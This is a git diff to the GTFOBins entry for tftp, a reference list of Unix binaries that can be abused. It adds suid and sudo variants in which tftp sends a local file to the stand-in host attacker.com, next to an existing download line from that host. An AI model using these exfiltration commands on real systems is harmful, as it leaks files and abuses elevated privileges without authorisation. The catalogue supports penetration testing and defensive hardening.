diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md index f391860..d47af31 100644 --- a/_gtfobins/tftp.md +++ b/_gtfobins/tftp.md @@ -12,4 +12,16 @@ functions: RHOST=attacker.com tftp $RHOST get file_to_get + suid-enabled: + - description: Send local file to a TFTP server. + code: | + RHOST=attacker.com + ./tftp $RHOST + put file_to_send + sudo-enabled: + - description: Send local file to a TFTP server. + code: | + RHOST=attacker.com + sudo -E tftp $RHOST + put file_to_send ---